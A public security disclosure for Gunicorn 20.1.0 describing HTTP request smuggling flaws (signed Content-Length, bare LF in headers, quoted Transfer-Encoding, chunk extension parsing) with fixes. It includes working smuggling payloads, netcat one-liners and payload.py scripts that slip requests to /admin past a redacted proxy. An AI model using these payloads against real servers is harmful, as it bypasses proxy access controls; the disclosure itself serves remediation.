Gunicorn 20.1.0 Public Disclosure of Request Smuggling

2021-10-08 - Mattias Grenfeldt and Asta Olofsson

Summary

In our Bachelor's degree project we tested some open source proxies and servers for HTTP Request Smuggling vulnerabilities. This is what we found in Gunicorn. It has been more than 90 days since we reported these issues and Gunicorn has not fixed them, so this is our public disclosure.

You can read more about our Bachelor's thesis and find a link to the full thesis here.

We submitted two separate reports to Gunicorn. Below follow the two reports as they were submitted. Some parts of this post are redacted to avoid revealing other systems which haven't finished patching yet. At the bottom, there is a timeline of when submissions happened.

First Report: Several Request Smuggling vulnerabilities

Summary

In total we found 3 full attacks when Gunicorn is put behind [REDACTED]. These issues have also been reported to them. We also found 3 additional issues that would cause HRS when combined with the right proxy, but we don't know of any such proxy that currently exists. We also found some minor specification violations that don't directly cause HRS but should be fixed.

These issues were originally found in Gunicorn 20.0.4, but all still work in 20.1.0.

Proof of Concept

Included in the zip you will find a Proof of Concept setup using Docker and docker-compose which sets up Gunicorn as a server behind [REDACTED]. This can be used to verify the full attacks below.

Authors' Comment

(not part of original report)

We can't show the entire PoC since it would reveal the proxy. But here is the app.py file that Gunicorn is serving:

from flask import Flask
app = Flask(__name__)

@app.route("/")
def index():
    return "INDEX\n"

@app.route("/admin", methods = ['GET', 'DELETE'])
def admin():
    print("/ADMIN was requested!!!", flush=True)
    return "ADMIN\n"

@app.route("/forbidden")
def forbidden():
    return "FORBIDDEN\n"

if __name__ == "__main__":
    app.run()

Gunicorn uses eventlet as a worker, to enable Keep-Alive connections, which is a prerequisite for HRS.

To run the PoC, unzip the zip and run:

$ docker-compose up --build

Now Gunicorn can be directly accessed at http://localhost:8081 and [REDACTED] can be accessed at http://localhost:8080.

Here are examples of interacting with Gunicorn directly:

$ curl http://localhost:8081/
INDEX
$ curl http://localhost:8081/admin
ADMIN
$ curl http://localhost:8081/forbidden
FORBIDDEN

Here is how it looks interacting with [REDACTED]:

$ curl http://localhost:8080/
INDEX
$ curl http://localhost:8080/admin
FORBIDDEN
$ curl http://localhost:8080/forbidden
FORBIDDEN

Plus and minus sign in the Content-Length header

This is the first full attack. Gunicorn accepts a plus sign or a minus sign in front of the value in the Content-Length header.

Example:

GET / HTTP/1.1
Host: example.com
Content-Length: +3
 
abc

This request gets accepted and Gunicorn reads the body.

According to RFC 7230, only digits are allowed in the Content-Length header value. See the ABNF here.

For an HRS vulnerability to occur, a proxy would have to forward the CL header as is and interpret the length of the body as 0. [REDACTED] does this. However, this is an example of Backward HRS rather than Forward HRS (see here, Section "Example #3: Forward vs. backward HRS", for an example), so the proxy must communicate with the server using pipelining for there to be a vulnerability, and [REDACTED] doesn't support pipelining.

However, an additional bug was found in Gunicorn which still enables the attack.

Send response before reading body

As it turned out, a bug was discovered which causes Gunicorn to send the response before reading the body of the corresponding request. This only occurs if the request handler invoked by Gunicorn never reads any part of the body.

This can be demonstrated by sending the following, incomplete request directly to Gunicorn in the PoC setup:

GET / HTTP/1.1
Host: example.com
Content-Length: 10

This can be sent using the following one-liner:

$ echo -en "GET / HTTP/1.1\r\nHost: example.com\r\nContent-Length: 10\r\n\r\n" | nc localhost 8081

Gunicorn reads the headers of the incomplete request and passes them to the Flask handler. The handler does not read any part of the body and hands control back to Gunicorn, which sends the response and only then reads the missing body. The body of the request should be read before the response is sent.
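
The ordering asked for here can be sketched as follows. This is a minimal illustration and not Gunicorn's code: drain_body and its parameters are hypothetical names, and rfile stands for any blocking file-like object wrapping the client connection. The idea is that the server consumes whatever part of the declared body the handler left unread before it writes the response.

```python
import io


def drain_body(rfile, content_length, already_read=0, bufsize=8192):
    """Read and discard the unread remainder of a request body.

    Hypothetical helper: a server would call this after the handler
    returns and before the response is written.
    """
    remaining = content_length - already_read
    while remaining > 0:
        chunk = rfile.read(min(bufsize, remaining))
        if not chunk:
            # The peer closed the connection before sending the full body.
            raise ConnectionError("request body shorter than Content-Length")
        remaining -= len(chunk)


# Simulated connection: a 10-byte body followed by the next pipelined request.
conn = io.BytesIO(b"0123456789GET /next HTTP/1.1\r\n\r\n")
drain_body(conn, content_length=10)
next_bytes = conn.read()  # what is left on the connection after draining
```

With the incomplete request from the one-liner above, such a server would keep waiting for the 10 missing bytes instead of answering early.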

This bug enables the above Plus sign in CL attack. Here comes the smuggling part! Now we are going to send the following to [REDACTED]:

GET / HTTP/1.1
Host: localhost:8080
Content-Length: +23

GET / HTTP/1.1
Dummy: GET /admin HTTP/1.1
Host: localhost:8080

In this case [REDACTED] will see two requests:

GET / HTTP/1.1
Host: localhost:8080
Content-Length: +23

GET / HTTP/1.1
Dummy: GET /admin HTTP/1.1
Host: localhost:8080

And Gunicorn will see two different requests:

GET / HTTP/1.1
Host: localhost:8080
Content-Length: +23

GET / HTTP/1.1
Dummy:

GET /admin HTTP/1.1
Host: localhost:8080

We can send this with the following command. The result is shown right after:

$ echo -en "GET / HTTP/1.1\r\nHost: localhost:8080\r\nContent-Length: +23\r\n\r\nGET / HTTP/1.1\r\nDummy: GET /admin HTTP/1.1\r\nHost: localhost:8080\r\n\r\n" | nc localhost 8080

HTTP/1.1 200 OK
Content-Length: 6

INDEX
HTTP/1.1 200 OK
Content-Length: 6

ADMIN

We can see that we get two responses, one from the / endpoint and one from the /admin endpoint. We managed to smuggle a request for /admin past [REDACTED] directly to Gunicorn.
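
The disagreement between the two parsers can be reproduced offline with a toy model. The sketch below is an illustration under stated assumptions, not the code of either system: split_requests is a hypothetical helper that frames requests using Content-Length only, and the accept_plus_sign flag models the one difference described in the text (a value the parser does not accept is treated as length 0).

```python
import re

PAYLOAD = (
    b"GET / HTTP/1.1\r\n"
    b"Host: localhost:8080\r\n"
    b"Content-Length: +23\r\n"
    b"\r\n"
    b"GET / HTTP/1.1\r\n"
    b"Dummy: GET /admin HTTP/1.1\r\n"
    b"Host: localhost:8080\r\n"
    b"\r\n"
)


def split_requests(stream, accept_plus_sign):
    """Toy splitter: frame pipelined requests using Content-Length only."""
    pattern = rb"\+?[0-9]+" if accept_plus_sign else rb"[0-9]+"
    requests = []
    while stream:
        head, sep, rest = stream.partition(b"\r\n\r\n")
        if not sep:
            break  # incomplete header block
        length = 0
        for line in head.split(b"\r\n")[1:]:  # skip the request line
            name, _, value = line.partition(b":")
            if name.lower() == b"content-length":
                value = value.strip()
                # A value this parser does not accept counts as length 0.
                if re.fullmatch(pattern, value):
                    length = int(value)
        requests.append(head + sep + rest[:length])
        stream = rest[length:]
    return requests


proxy_view = split_requests(PAYLOAD, accept_plus_sign=False)
gunicorn_view = split_requests(PAYLOAD, accept_plus_sign=True)

for label, view in (("proxy", proxy_view), ("gunicorn", gunicorn_view)):
    print(label, [req.split(b"\r\n")[0] for req in view])
```

Both views contain two requests, but the second request line is GET / in the proxy view and GET /admin in the Gunicorn view, because the 23 bytes "GET / HTTP/1.1\r\nDummy: " are consumed as the body of the first request.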

The Fix

Respond with 400 Bad Request on all requests containing Content-Length headers that don't match the correct ABNF

Content-Length = 1*DIGIT

from here
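
A minimal sketch of such a check in Python, assuming the header value arrives as bytes with surrounding whitespace already stripped. parse_content_length is a hypothetical name, not a Gunicorn function. The explicit pattern matters because Python's built-in int() is more permissive than the ABNF: it also accepts a leading sign, surrounding whitespace and underscores between digits.

```python
import re

_CONTENT_LENGTH = re.compile(rb"[0-9]+")  # Content-Length = 1*DIGIT


def parse_content_length(value):
    """Return the length as an int, or raise ValueError (answer with 400)."""
    if _CONTENT_LENGTH.fullmatch(value) is None:
        raise ValueError("invalid Content-Length: %r" % (value,))
    return int(value)
```

A caller would map the ValueError to a 400 Bad Request response and close the connection.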

Illegal characters in header value

Gunicorn accepts CR and LF as part of header values. These characters are not allowed in header values. In the case of LF, this causes the second full attack in combination with [REDACTED], since [REDACTED] interprets LF as a line ending and forwards it. An attack using CR would work in the same way, but we have not found a proxy which interprets a single CR as a line ending.

Here is the attack. We are going to send the following to [REDACTED]:

GET / HTTP/1.1
Host: localhost:8080
Dummy: x\nContent-Length: 28

GET /admin HTTP/1.1
Dummy: GET / HTTP/1.1
Host: localhost:8080

In this case [REDACTED] will see two requests:

GET / HTTP/1.1
Host: localhost:8080
Dummy: x\nContent-Length: 28

GET /admin HTTP/1.1
Dummy:

GET / HTTP/1.1
Host: localhost:8080

And Gunicorn will see two different requests:

GET / HTTP/1.1
Host: localhost:8080
Dummy: x\nContent-Length: 28

GET /admin HTTP/1.1
Dummy: GET / HTTP/1.1
Host: localhost:8080

We can send this with the following command. The result is shown right after:

$ echo -en "GET / HTTP/1.1\r\nHost: localhost:8080\r\nDummy: x\nContent-Length: 28\r\n\r\nGET /admin HTTP/1.1\r\nDummy: GET / HTTP/1.1\r\nHost: localhost:8080\r\n\r\n" | nc localhost 8080

HTTP/1.1 200 OK
Content-Length: 6

INDEX
HTTP/1.1 200 OK
Content-Length: 6

ADMIN

We can see that we managed to reach the /admin endpoint.
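
The difference in line splitting, and where the value 28 comes from, can be checked with a few lines of Python. This is only a sketch of the two readings described above; it does not reproduce the code of either system.

```python
import re

head = (
    b"GET / HTTP/1.1\r\n"
    b"Host: localhost:8080\r\n"
    b"Dummy: x\nContent-Length: 28"
)

# Strict reading: only CRLF ends a header line (how Gunicorn frames this request).
crlf_lines = head.split(b"\r\n")

# Lenient reading: a bare LF also ends a line (how the proxy is described above).
lf_lines = re.split(rb"\r?\n", head)

# The bytes the lenient reader then consumes as the body of the first request.
hidden = b"GET /admin HTTP/1.1\r\n" + b"Dummy: "

print(len(crlf_lines), len(lf_lines), len(hidden))  # prints: 3 4 28
```

Only the lenient reading produces a separate "Content-Length: 28" line, so only the proxy skips the 28 bytes that contain the /admin request line.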

The Fix

Filter all characters in header values to only contain the accepted ones. These are the allowed bytes: 0x21-0x7E and 0x80-0xff.

Sources: here and here
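
A sketch of such a filter, assuming header values are handled as bytes and that leading and trailing whitespace has already been stripped. is_valid_field_value is a hypothetical name. Besides the bytes listed above, the sketch also permits SP and HTAB between visible characters, as the field-content rule in RFC 7230 does; without that, ordinary values such as "text/html; charset=utf-8" would be rejected.

```python
import re

# field-vchar = VCHAR / obs-text, i.e. 0x21-0x7e and 0x80-0xff.
_VCHAR = rb"[\x21-\x7e\x80-\xff]"
# SP and HTAB may appear, but only between two visible characters.
_FIELD_VALUE = re.compile(
    _VCHAR + rb"(?:[ \t\x21-\x7e\x80-\xff]*" + _VCHAR + rb")?"
)


def is_valid_field_value(value):
    """Check a header value whose surrounding whitespace was already stripped."""
    return value == b"" or _FIELD_VALUE.fullmatch(value) is not None
```

With this check, the value "x\nContent-Length: 28" from the attack above is rejected because it contains a bare LF.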

Ignoring unknown transfer encoding values

This is the third full attack. Gunicorn ignores all transfer encoding values which it does not support. According to the specification (RFC 7230): "A server that receives a request message with a transfer coding it does not understand SHOULD respond with 501 (Not Implemented)."

[REDACTED] interprets requests with Transfer-Encoding: "chunked" (including the quotes) as a valid chunked request and forwards the TE header unmodified. Since Gunicorn ignores unknown TE headers, this enables us to smuggle a chunked body and Gunicorn will interpret it as a request. Due to a bug in how [REDACTED] parses and forwards chunked bodies, a valid DELETE request can be forwarded as the smuggled chunked body. Due to another bug in [REDACTED] however, the response cannot be smuggled back to the sender as in the other cases.

To summarize: Because Gunicorn ignores unknown TE values, DELETE requests can be smuggled past [REDACTED] to Gunicorn, but the responses can't be seen.

Here is the attack. We are going to send the following to [REDACTED]:

GET / HTTP/1.1
Host: localhost:8080
Transfer-Encoding: "chunked"

DELETE /admin HTTP/1.1
Host: localhost:8080
Padding: AAAAAAAAAAA[repeated 191 times]AAAAAAAAAAA
0: x

In this case [REDACTED] will see only one request, the GET. But Gunicorn will see two requests, both the GET and the DELETE.

We can send this with the following command. The result is shown right after:

$ python3 -c 'import sys;sys.stdout.buffer.write(b"GET / HTTP/1.1\r\nHost: localhost:8080\r\nTransfer-Encoding: \"chunked\"\r\n\r\nDELETE /admin HTTP/1.1\r\nHost: localhost:8080\r\nPadding: "+b"A"*191+b"\r\n0: x\r\n\r\n")' | nc localhost 8080
HTTP/1.1 200 OK
Content-Length: 6
Connection: keep-alive

INDEX

We can't see any proof of smuggling a request to /admin in the response. But if we look in the console of docker-compose, we can see that the debug message "/ADMIN was requested!!!" has been printed.

The Fix

There are two approaches to parse the Transfer-Encoding header correctly. The first approach is when multiple values in the header are to be supported:

1. If obs-folds are supported, replace them with spaces, collapsing the obs-fold onto one line. See the sixth paragraph here
2. If there are multiple separate TE headers, combine them into one by joining their values with a comma as delimiter. See third paragraph here
3. Split the now single TE value at commas and strip/trim any spaces around the separate elements. Now you have a list of strings. Sources: here and here
4. Check that the last value in the list equals 'chunked' (compared case-insensitively). If it does not, respond with 400 Bad Request. See item 3 here and paragraph 3 here
5. Check that 'chunked' doesn't appear anywhere else in the list. See paragraph 3 here
6. Parse each string in the list for potential 'transfer-extension's. Details can be found here
7. Check that all values in the list are supported, otherwise respond with 501 Not Implemented. See last paragraph here
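
The first approach can be sketched roughly as below. This is a hedged illustration, not a complete implementation: parse_transfer_codings and its supported parameter are hypothetical names, the input is assumed to be the raw byte values of every Transfer-Encoding header in order, and the duplicate-'chunked' check and the parsing of transfer-extension parameters are left out.

```python
import re


def parse_transfer_codings(header_values, supported=frozenset({"chunked"})):
    """Return (status, codings); status is None when the header is acceptable."""
    # Unfold obs-folds (CRLF followed by SP/HTAB) into single spaces.
    unfolded = [re.sub(rb"\r\n[ \t]+", b" ", v) for v in header_values]
    # Combine repeated headers into one comma-separated value.
    combined = b",".join(unfolded).decode("latin-1")
    # Split at commas and trim optional whitespace; drop empty list elements.
    codings = [c.strip(" \t").lower() for c in combined.split(",")]
    codings = [c for c in codings if c]
    # The final coding must be chunked, otherwise 400 Bad Request.
    if not codings or codings[-1] != "chunked":
        return 400, codings
    # Every coding must be one this server implements, otherwise 501.
    if any(c not in supported for c in codings):
        return 501, codings
    return None, codings
```

For the quoted value "chunked" used in the attack above, the last element is not equal to chunked, so the request is rejected with 400 instead of being treated as having no body framing.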

Authors' Comment

(not part of original report)

Step 5 in the list above is wrong, since the RFC reads: "A sender MUST NOT apply chunked more than once to a message body [...]" And we are talking here about what a receiver should or should not do.

The second approach is for when only 'chunked' is to be supported and is much simpler. This approach is adopted by Nginx and Go.

1. See step 1 above.
2. Reject all messages with more than one TE header.
3. Check that the TE header has the case-insensitive value 'chunked'. If not, respond with 501 Not Implemented.
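
A minimal sketch of this simpler approach, assuming the caller passes a non-empty list with the raw byte value of every Transfer-Encoding header in the request. check_chunked_only is a hypothetical name, and the 400 status for repeated headers is an assumption, since the text only says to reject.

```python
import re


def check_chunked_only(header_values):
    """Return None to accept the body as chunked, else a status code."""
    if len(header_values) != 1:
        return 400  # assumption: status for "more than one TE header"
    # Unfold obs-folds, then trim optional whitespace around the value.
    value = re.sub(rb"\r\n[ \t]+", b" ", header_values[0]).strip(b" \t")
    if value.lower() != b"chunked":
        return 501  # Not Implemented
    return None
```

The comparison is against the whole value, so a list such as "gzip, chunked" and the quoted "chunked" are both answered with 501.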

0xN chunksize

Gunicorn accepts requests containing chunksize in the form "0xN".

Example:

GET / HTTP/1.1
Host: example.com
Transfer-Encoding: chunked

0x3
abc
0

This request gets accepted by Gunicorn and it reads the body as abc. This combined with [REDACTED] almost became another full attack, but due to some technicalities in [REDACTED], the attack is currently impossible. The attack would have used the fact that [REDACTED] would interpret a chunk size in the format 0xN as having size 0.

The Fix

Only allow hexadecimal strings as the chunk size. No 0x prefix. See here
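
A minimal sketch of a strict chunk size parser, assuming the size token has already been separated from any chunk extension. parse_chunk_size is a hypothetical name. Matching against an explicit pattern first is the point: Python's int(token, 16) on its own accepts a 0x prefix, a sign, surrounding whitespace and underscores.

```python
import re

_CHUNK_SIZE = re.compile(rb"[0-9A-Fa-f]+")  # chunk-size = 1*HEXDIG


def parse_chunk_size(token):
    """Return the chunk size, or raise ValueError (answer with 400)."""
    if _CHUNK_SIZE.fullmatch(token) is None:
        raise ValueError("invalid chunk size: %r" % (token,))
    return int(token, 16)
```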

HTTP versions / Interprets 1.0 with TE chunked

Authors' Comment

(not part of original report)

The way Gunicorn behaves in the following issue "Interprets 1.0 with TE chunked" is not wrong, even though we say it is. We discovered that the RFCs can be interpreted in two different ways regarding this issue. We brought it up to the httpwg in an issue on their GitHub which resulted in them making changes to the new RFC. The issue can be found here. We also informed Gunicorn about our mistake.

Gunicorn accepts requests with any HTTP version, including 0.9, 1.0 and nonexistent ones such as 8.9 or 483920749374584.738927489734, and interprets them all as 1.1. When Gunicorn responds to a request, it echoes the version of the request in the version of the response.

The Transfer-Encoding header was introduced in version 1.1. This means in version 1.0 a Transfer-Encoding header with the value chunked should be ignored. Gunicorn however interprets the request as chunked. Example:

GET / HTTP/1.0
Host: example.com
Transfer-Encoding: chunked

3
xyz
0

Gunicorn would interpret this as having the body 'xyz'.

This could cause HRS if combined with a proxy which correctly ignores, but forwards TE headers in 1.0 requests. If a request is sent with both a CL and a TE header, the proxy would interpret CL and Gunicorn would interpret the TE header.

This almost exists in Go proxies (Caddy, Traefik). They ignore the TE header on 1.0 requests, but don't forward it.

The Fix

Ignore the TE header on 1.0 requests or reject the request entirely.

Also, reject any requests with unsupported versions and don't echo back anything that is received.
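
The version check could look roughly like the sketch below. check_http_version, SUPPORTED_VERSIONS and RESPONSE_VERSION are hypothetical names, and the choice of 400 for a malformed token and 505 (HTTP Version Not Supported) for a well-formed but unsupported one is an assumption, not something the report prescribes.

```python
import re

# HTTP-version = "HTTP/" DIGIT "." DIGIT
_HTTP_VERSION = re.compile(rb"HTTP/([0-9])\.([0-9])")
SUPPORTED_VERSIONS = {(1, 0), (1, 1)}
# The server states its own version instead of echoing the client's token.
RESPONSE_VERSION = b"HTTP/1.1"


def check_http_version(token):
    """Return None if the version token is acceptable, else a status code."""
    match = _HTTP_VERSION.fullmatch(token)
    if match is None:
        return 400  # not a syntactically valid version
    version = (int(match.group(1)), int(match.group(2)))
    if version not in SUPPORTED_VERSIONS:
        return 505  # valid syntax, unsupported version
    return None
```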

No Host header accepted

Gunicorn accepts and responds to requests containing no Host header. According to the specification (RFC 7230) "A server MUST respond with a 400 (Bad Request) status code to any HTTP/1.1 request message that lacks a Host header field[...]" see here.
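
A sketch of the corresponding check, assuming headers are available as a list of (name, value) byte pairs and the version as a (major, minor) tuple. check_host_header is a hypothetical name. The same RFC 7230 sentence also requires a 400 for requests with more than one Host header, so the sketch covers that case as well.

```python
def check_host_header(version, headers):
    """Return 400 if the Host requirement is violated, else None."""
    hosts = [value for name, value in headers if name.lower() == b"host"]
    if len(hosts) > 1:
        return 400  # more than one Host header, in any HTTP version
    if version == (1, 1) and not hosts:
        return 400  # HTTP/1.1 request without a Host header
    return None
```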

Second Report: Request Smuggling due to chunked extension parsing

The Bug: Ignoring chunk extensions

In the chunked transfer encoding format there can be a so-called chunk extension after each chunk size. Example:

GET / HTTP/1.1
Host: localhost
Transfer-Encoding: chunked
 
5 ; a=b
hello
0

In the example above the chunk extension would be ; a=b. You can read more here and here.

Gunicorn doesn't try to parse the chunk extension properly, but simply ignores every byte until it reaches a \r (source). By following the ABNF of chunk extensions one can see that the only allowed bytes in this area are 0x09, 0x21-0x7e and 0x80-0xff. But Gunicorn allows any byte. This is the bug.
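
A byte-level check for this area could look like the sketch below. check_chunk_ext is a hypothetical name and the function only validates which bytes occur, not the full chunk-ext grammar. It takes the bytes between the chunk size and the terminating CRLF. As an assumption beyond the byte set listed above, SP (0x20) is also tolerated so that the "5 ; a=b" example passes; remove it from the pattern for the stricter set.

```python
import re

# HTAB, 0x21-0x7e and 0x80-0xff as listed in the text, plus SP (assumption).
_CHUNK_EXT = re.compile(rb"[\t \x21-\x7e\x80-\xff]*")


def check_chunk_ext(ext):
    """Raise ValueError if the chunk extension area contains illegal bytes."""
    if _CHUNK_EXT.fullmatch(ext) is None:
        raise ValueError("illegal byte in chunk extension: %r" % (ext,))
```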

Notably we can put a \n in this area. This allows us to perform HRS when combined with [REDACTED]. This is because [REDACTED] also incorrectly parses the chunked extension. [REDACTED] looks for the first \n character and doesn't verify whether it was preceded by a \r. We arrive at the following attack:

GET / HTTP/1.1
Host: localhost:8080
Transfer-Encoding: chunked
 
2;\nxx
4c
0

GET /admin HTTP/1.1
Host: localhost:8080
Transfer-Encoding: chunked
 
0

By sending the data above when [REDACTED] is a proxy in front of Gunicorn, [REDACTED] will see one request to / and Gunicorn will see two requests, one to / and one to /admin. Note that all lines are terminated by CRLF (\r\n).
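
The two readings of this body can be simulated with a toy chunked reader. The sketch below is an illustration under stated assumptions and not the code of either system: read_chunked is a hypothetical helper whose line_end argument is the byte sequence the reader accepts as the end of a chunk-size line (CRLF for the Gunicorn-like reading, a bare LF for the proxy-like reading).

```python
SMUGGLED = (
    b"GET /admin HTTP/1.1\r\n"
    b"Host: localhost:8080\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"0\r\n"
    b"\r\n"
)

# Everything that follows the header block of the first request.
BODY = b"2;\nxx\r\n" + b"4c\r\n" + b"0\r\n" + b"\r\n" + SMUGGLED


def read_chunked(data, line_end):
    """Toy chunked reader; returns (decoded body, bytes left on the connection).

    Chunk extensions are skipped without validation and trailers are not handled.
    """
    pos, body = 0, b""
    while True:
        end = data.index(line_end, pos)
        size_line = data[pos:end]
        size = int(size_line.split(b";")[0].strip(), 16)
        pos = end + len(line_end)
        if size == 0:
            # Last chunk: skip the empty line that ends the message.
            pos = data.index(line_end, pos) + len(line_end)
            return body, data[pos:]
        body += data[pos:pos + size]
        pos += size + 2  # step over the CRLF that follows the chunk data


gunicorn_body, gunicorn_rest = read_chunked(BODY, b"\r\n")
proxy_body, proxy_rest = read_chunked(BODY, b"\n")
```

In the Gunicorn-like reading the body is just "4c" and the whole /admin request is left on the connection as a second request. In the proxy-like reading the 0x4c-byte chunk swallows most of the /admin request and nothing is left over.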

Usually with HRS it is possible to smuggle a request past a proxy directly to the server and then get a response for the smuggled request back to the attacker. But due to a bug in [REDACTED] where the connection hangs after a chunked request is sent, we can in this case only send a smuggled request and not see the response. But we have full control over the headers and body of the smuggled request.

Proof of Concept

This Proof of Concept requires docker and docker-compose.

Unzip the attached poc.zip. Start the systems with sudo docker-compose up --build. Now Gunicorn can be accessed directly at http://localhost:8081 and [REDACTED] (forwarding to Gunicorn) can be accessed at http://localhost:8080

Gunicorn behaves like this:

$ curl http://localhost:8081
INDEX
$ curl http://localhost:8081/admin
ADMIN
$ curl http://localhost:8081/forbidden
FORBIDDEN

Note that when /admin is requested, then "/ADMIN was requested!!!" is printed in the docker-compose terminal.

[REDACTED] behaves like this:

$ curl http://localhost:8080
INDEX
$ curl http://localhost:8080/admin
FORBIDDEN
$ curl http://localhost:8080/forbidden
FORBIDDEN

Note that all requests to /admin are rerouted to /forbidden by [REDACTED]. So the /admin endpoint can't be reached.

Now it's time to send the attack described above. This can be done by using the included payload.py. The attack can be sent using the following command:

$ python3 payload.py | nc localhost 8080

Authors' Comment

(not part of original report)

We can't show the entire PoC since it would reveal the proxy. But here is payload.py:

import sys

smuggled = (
    b"GET /admin HTTP/1.1\r\n" +
    b"Host: localhost:8080\r\n" +
    b"Transfer-Encoding: chunked\r\n" +
    b"\r\n" +
    b"0\r\n" +
    b"\r\n"
)

def h(n):
    return hex(n)[2:].encode()

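# From the proxy's point of view the second chunk carries b"0\r\n\r\n" (5 bytes)
# plus the smuggled request without its final 7 bytes (b"\r\n0\r\n\r\n"), which
# the proxy instead reads as the chunk terminator and the last chunk.
smuggled_len = h(len(smuggled) - 7 + 5)

# The first chunk must be as long as that hex string: the proxy reads the "x"
# filler as the chunk data, while Gunicorn reads the hex string itself.
first_chunk_len = h(len(smuggled_len))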

sys.stdout.buffer.write(
    b"GET / HTTP/1.1\r\n" +
    b"Host: localhost:8080\r\n" +
    b"Transfer-Encoding: chunked\r\n" +
    b"\r\n" +
    first_chunk_len + b";\n" + b"x"*len(smuggled_len) + b"\r\n" +
    smuggled_len + b"\r\n" +
    b"0\r\n" +
    b"\r\n" +
    smuggled
)

When the attack is sent, we see "/ADMIN was requested!!!" being printed in the terminal. So we bypassed the proxy and reached /admin.

(As mentioned before, due to a bug in [REDACTED], the response to the smuggled request can't be seen. If [REDACTED] did not have this bug, payload2.py could have been used to both send the smuggled request and see its response.)

Authors' Comment

(not part of original report)

We can't show the entire PoC since it would reveal the proxy. But here is payload2.py:

import sys

last = (
    b"GET / HTTP/1.1\r\n" +
    b"Host: localhost:8080\r\n" +
    b"\r\n"
)

smuggled = (
    b"GET /admin HTTP/1.1\r\n" +
    b"Host: localhost:8080\r\n" +
    b"Content-Length: " + str(len(last) + 5).encode() + b"\r\n" +
    b"\r\n" +
    b"0\r\n" +
    b"\r\n"
)

def h(n):
    return hex(n)[2:].encode()

smuggled_len = h(len(smuggled) - 7 + 5)

first_chunk_len = h(len(smuggled_len))

sys.stdout.buffer.write(
    b"GET / HTTP/1.1\r\n" +
    b"Host: localhost:8080\r\n" +
    b"Transfer-Encoding: chunked\r\n" +
    b"\r\n" +
    first_chunk_len + b";\n" + b"x"*len(smuggled_len) + b"\r\n" +
    smuggled_len + b"\r\n" +
    b"0\r\n" +
    b"\r\n" +
    smuggled +
    last
)

Impact

If the proxy is acting as an access control system, only allowing certain requests to come through, it can be bypassed, allowing any request to be sent to the server.

Timeline

2021-05-15: Emailed [email protected] about the first report.
2021-06-27: Emailed [email protected] about the second report.
2021-10-08: This blog post is released. 146 days after first report and 103 days after second report.